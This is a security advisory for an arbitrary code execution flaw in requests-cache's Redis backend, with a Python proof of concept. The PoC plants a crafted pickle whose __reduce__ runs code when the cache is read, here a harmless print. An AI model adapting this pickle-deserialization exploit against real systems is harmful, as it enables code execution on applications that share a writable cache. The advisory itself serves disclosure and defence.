Arbitrary Code Execution Affecting requests-cache package, versions [,0.6.0.dev1)
Snyk CVSS
- Attack Complexity: Low
- Confidentiality: High
- Integrity: High
- Availability: High
Threat Intelligence
- Exploit Maturity: Proof of concept
- Snyk ID SNYK-PYTHON-REQUESTSCACHE-1089050
- published 25 Mar 2021
- disclosed 25 Mar 2021
- credit Varbin
How to fix?
Upgrade requests-cache to version 0.6.0.dev1 or higher.
Overview
requests-cache is a persistent cache for the requests library.
Affected versions of this package are vulnerable to Arbitrary Code Execution through the Redis cache backend: cached responses are stored in Redis as pickled objects and unpickled on read, so anyone with write access to the Redis cache can replace a cached entry with a crafted pickle that executes code in the application when the cache is next accessed.
PoC
```python
import requests
import requests_cache

# Victim side: cache backed by Redis, then fill it with one response
requests_cache.install_cache(cache_name='cache', backend='redis')
requests_cache.clear()
print("Filling cache.")
response = requests.get("https://example.org")

### attacker's part
print('Attacker: "Planting" exploit')
from redis import StrictRedis as Redis
from requests_cache.backends.storage.redisdict import RedisDict

rd = Redis()


class Exploit:
    # __reduce__ tells pickle how to rebuild the object: here, by calling print()
    def __reduce__(self):
        return (print, ("I won.",))


import pickle

exploit = pickle.dumps(Exploit(), protocol=0)
# overwrite every cached response in the Redis hash with the pickled payload
for key in rd.hgetall("cache:responses").keys():
    rd.hset("cache:responses", key, exploit)
print('Attacker: finished')
### end of attacker's part

print("Accessing cache")
# the cache hit unpickles the planted value, which runs print("I won.")
response = requests.get("https://example.org")
```